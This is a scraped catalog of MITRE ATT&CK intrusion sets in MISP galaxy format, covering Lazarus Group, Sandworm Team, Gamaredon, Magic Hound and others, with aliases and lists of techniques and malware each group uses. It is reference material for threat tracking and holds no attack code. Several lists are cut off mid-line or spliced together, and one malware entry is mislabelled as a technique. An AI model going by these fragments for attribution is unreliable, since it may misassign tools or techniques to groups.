• uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="ShadowPad - S0596" with estimative-language:likelihood-probability="almost-certain"

Table 4276. Table References
Lazarus Group - G0032

[Lazarus Group](https://attack.mitre.org/groups/G0032) is a threat group that has been attributed to the North Korean government. (Citation: US-CERT HIDDEN COBRA June 2017) The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://attack.mitre.org/groups/G0032) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. (Citation: Novetta Blockbuster) In late 2017, [Lazarus Group](https://attack.mitre.org/groups/G0032) used KillDisk, a disk-wiping tool, in an attack against an online casino based in Central America. (Citation: Lazarus KillDisk)

North Korean group definitions are known to have significant overlap, and the name [Lazarus Group](https://attack.mitre.org/groups/G0032) is known to encompass a broad range of activity. Some organizations use the name Lazarus Group to refer to any activity attributed to North Korea. (Citation: US-CERT HIDDEN COBRA June 2017) Some organizations track North Korean clusters or groups such as Bluenoroff, (Citation: Kaspersky Lazarus Under The Hood Blog 2017) [APT37](https://attack.mitre.org/groups/G0067), and [APT38](https://attack.mitre.org/groups/G0082) separately, while other organizations may track some activity associated with those group names by the name Lazarus Group.

The tag is: `misp-galaxy:mitre-intrusion-set="Lazarus Group - G0032"`

Lazarus Group - G0032 is also known as:

- Lazarus Group
- HIDDEN COBRA
- Guardians of Peace
- ZINC
- NICKEL ACADEMY

Lazarus Group - G0032 has relationships with:

- similar: misp-galaxy:threat-actor="Lazarus Group" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-malware="Proxysvc - S0238" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1218.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Bootkit - T1542.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="KEYMARBLE - S0271" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="Volgmer - S0180" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

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• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="netsh - S0108" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"

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• uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

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• uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Password Spraying - T1110.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="TYPEFRAME - S0263" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="AuditCred - S0347" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="FALLCHILL - S0181" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Multiband Communication - T1026" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Disk Structure Wipe - T1561.002" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Disk Content Wipe - T1561.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"
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- uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Internal Defacement - T1491.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="HotCroissant - S0431" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="Dacls - S0497" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="Cryptoistic - S0498" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="BLINDINGCAN - S0520" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Domains - T1583.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Malware - T1587.001" with estimative-language:likelihood-probability="almost-certain"

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• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="TAINTEDSCRIBE - S0586" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="Dtrack - S0567" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="ECCENTRICBANDWAGON - S0593" with estimative-language:likelihood-probability="almost-certain"

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Putter Panda - G0024

[Putter Panda](https://attack.mitre.org/groups/G0024) is a Chinese threat group that has been attributed to Unit 61486 of the 12th Bureau of the PLA's 3rd General Staff Department (GSD). (Citation: CrowdStrike Putter Panda)

The tag is: `misp-galaxy:mitre-intrusion-set="Putter Panda - G0024"`

Putter Panda - G0024 is also known as:

- Putter Panda
- APT2
- MSUpdater

Putter Panda - G0024 has relationships with:

- similar: `misp-galaxy:threat-actor="Putter Panda"` with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-malware="httpclient - S0068"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-malware="4H RAT - S0065"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-malware="pngdowner - S0067"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-malware="3PARA RAT - S0066"` with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/groups/G0024">https://attack.mitre.org/groups/G0024</a></td>
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<td><a href="http://blog.cylance.com/puttering-into-the-future">http://blog.cylance.com/puttering-into-the-future</a></td>
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Scarlet Mimic - G0029

[Scarlet Mimic](https://attack.mitre.org/groups/G0029) is a threat group that has targeted minority rights activists. This group has not been directly linked to a government source, but the group's motivations appear to overlap with those of the Chinese government. While there is some overlap between IP addresses used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029) and [Putter Panda](https://attack.mitre.org/groups/G0024), it has not been concluded that the groups are the same. (Citation: Scarlet Mimic Jan 2016)

The tag is: `misp-galaxy:mitre-intrusion-set="Scarlet Mimic - G0029"`

Scarlet Mimic - G0029 is also known as:

- Scarlet Mimic

Scarlet Mimic - G0029 has relationships with:

- similar: `misp-galaxy:threat-actor="Scarlet Mimic"` with `estimative-language:likelihood-probability="likely"`
- uses: `misp-galaxy:mitre-malware="Psylo - S0078"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-malware="FakeM - S0076"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-malware="MobileOrder - S0079"` with `estimative-language:likelihood-probability="almost-certain"`

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Poseidon Group - G0033

[Poseidon Group](https://attack.mitre.org/groups/G0033) is a Portuguese-speaking threat group that has been active since at least 2005. The group has a history of using information exfiltrated from victims to blackmail victim companies into contracting the [Poseidon Group](https://attack.mitre.org/groups/G0033) as a security firm. (Citation: Kaspersky Poseidon Group)

The tag is: `misp-galaxy:mitre-intrusion-set="Poseidon Group - G0033"`
Poseidon Group - G0033 is also known as:

- Poseidon Group

Poseidon Group - G0033 has relationships with:

- similar: misp-galaxy:threat-actor="Poseidon Group" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

Table 4280. Table References

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<tr>
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<td><a href="https://attack.mitre.org/groups/G0033">https://attack.mitre.org/groups/G0033</a></td>
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</tbody>
</table>

Sandworm Team - G0034

[Sandworm Team](https://attack.mitre.org/groups/G0034) is a destructive threat group that has been attributed to Russia’s General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) This group has been active since at least 2009.(Citation: iSIGHT Sandworm 2014)(Citation: CrowdStrike VOODOO BEAR)(Citation: USDOJ Sandworm Feb 2020)(Citation: NCSC Sandworm Feb 2020)

In October 2020, the US indicted six GRU Unit 74455 officers associated with [Sandworm Team](https://attack.mitre.org/groups/G0034) for the following cyber operations: the 2015 and 2016 attacks against Ukrainian electrical companies and government organizations, the 2017 worldwide [NotPetya](https://attack.mitre.org/software/S0368) attack, targeting of the 2017 French presidential
campaign, the 2018 [Olympic Destroyer](https://attack.mitre.org/software/S0365) attack against the Winter Olympic Games, the 2018 operation against the Organisation for the Prohibition of Chemical Weapons, and attacks against the country of Georgia in 2018 and 2019. (Citation: US District Court Indictment GRU Unit 74455 October 2020) (Citation: UK NCSC Olympic Attacks October 2020) Some of these were conducted with the assistance of GRU Unit 26165, which is also referred to as [APT28](https://attack.mitre.org/groups/G0007). (Citation: US District Court Indictment GRU Oct 2018)

The tag is: *misp-galaxy:mitre-intrusion-set="Sandworm Team - G0034"

Sandworm Team - G0034 is also known as:

- Sandworm Team
- ELECTRUM
- Telebots
- IRON VIKING
- BlackEnergy (Group)
- Quedagh
- VOODOO BEAR

Sandworm Team - G0034 has relationships with:

- similar: misp-galaxy:threat-actor="Sandworm" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:threat-actor="TeleBots" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:threat-actor="ELECTRUM" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-malware="Exaramel for Linux - S0401" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="OlympicDestroyer - S0365" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="NotPetya - S0368" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Disk Structure Wipe - T1561.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Compromise Software Supply Chain - T1195.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Email Account - T1087.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="Invoke-PSImage - S0231" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Malware - T1587.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Social Media Accounts - T1585.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Email Accounts - T1585.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Trusted Relationship - T1199" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Domains - T1583.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Server - T1583.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Endpoint Denial of Service - T1499" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Domain Properties - T1590.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="External Defacement - T1491.002" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1598.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Employee Names - T1589.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Email Addresses - T1589.002" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="CHEMISTGAMES - S0555" with estimative-language:likelihood-probability="almost-certain"

Table 4281. Table References
Stealth Falcon - G0038

[Stealth Falcon](https://attack.mitre.org/groups/G0038) is a threat group that has conducted targeted spyware attacks against Emirati journalists, activists, and dissidents since at least 2012. Circumstantial evidence suggests there could be a link between this group and the United Arab Emirates (UAE) government, but that has not been confirmed. (Citation: Citizen Lab Stealth Falcon May 2016)

The tag is: misp-galaxy:mitre-intrusion-set="Stealth Falcon - G0038"

Stealth Falcon - G0038 is also known as:

- Stealth Falcon

Stealth Falcon - G0038 has relationships with:

- similar: misp-galaxy:threat-actor="Stealth Falcon" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-
Winnti Group - G0044

[Winnti Group](https://attack.mitre.org/groups/G0044) is a threat group with Chinese origins that has been active since at least 2010. The group has heavily targeted the gaming industry, but it has also expanded the scope of its targeting. (Citation: Kaspersky Winnti April 2013) (Citation: Kaspersky Winnti June 2015) (Citation: Novetta Winnti April 2015) Some reporting suggests a number of other groups, including [Axiom](https://attack.mitre.org/groups/G0001), [APT17](https://attack.mitre.org/groups/G0025), and [Ke3chang](https://attack.mitre.org/groups/G0004), are closely linked to [Winnti Group](https://attack.mitre.org/groups/G0044). (Citation: 401 TRG Winnti Umbrella May 2018)
The tag is: misp-galaxy:mitre-intrusion-set="Winnti Group - G0044"

Winnti Group - G0044 is also known as:

- Winnti Group
- Blackfly

Winnti Group - G0044 has relationships with:

- similar: misp-galaxy:threat-actor="Aurora Panda" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:threat-actor="Axiom" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="PipeMon - S0501" with estimative-language:likelihood-probability="almost-certain"

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</tr>
</tbody>
</table>

Gamaredon Group - G0047

[Gamaredon Group](https://attack.mitre.org/groups/G0047) is a threat group that has been active since at least 2013 and has targeted individuals likely involved in the Ukrainian government. The name [Gamaredon Group](https://attack.mitre.org/groups/G0047) comes from a misspelling of the word "Armageddon", which was detected in the adversary's early campaigns. (Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)
The tag is: misp-galaxy:mitre-intrusion-set="Gamaredon Group - G0047"

Gamaredon Group - G0047 is also known as:

- Gamaredon Group

Gamaredon Group - G0047 has relationships with:

- similar: misp-galaxy:threat-actor="Gamaredon Group" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Pteranodon - S0147" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Component Object Model - T1559.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Compile After Delivery - T1027.004" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Internal Spearphishing - T1534" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Office Application Startup - T1137" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Data from Network Shared Drive - T1039" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Taint Shared Content - T1080" with estimative-language:likelihood-probability="almost-certain"

Table 4284. Table References
Magic Hound - G0059

[Magic Hound](https://attack.mitre.org/groups/G0059) is an Iranian-sponsored threat group that conducts long term, resource-intensive cyber espionage operations, dating back as early as 2014. The group typically targets U.S. and Middle Eastern military organizations, as well as other government personnel, via complex social engineering campaigns.(Citation: FireEye APT35 2018)

The tag is: `misp-galaxy:mitre-intrusion-set="Magic Hound - G0059"`

Magic Hound - G0059 is also known as:

- Magic Hound
- COBALT ILLUSION
- Charming Kitten
- ITG18
- Phosphorus
- Newscaster
- APT35

Magic Hound - G0059 has relationships with:

- similar: `misp-galaxy:threat-actor="Flying Kitten"` with `estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:threat-actor="Charming Kitten"` with `estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:threat-actor="Rocket Kitten"` with `estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:threat-actor="Cleaver"` with `estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:threat-actor="OilRig"` with `estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:threat-actor="Clever Kitten"` with `estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:threat-actor="CHRYSENE"` with `estimative-language:likelihood-probability="likely"`
• uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Email Collection - T1114.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="Pupy - S0192" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-
• uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

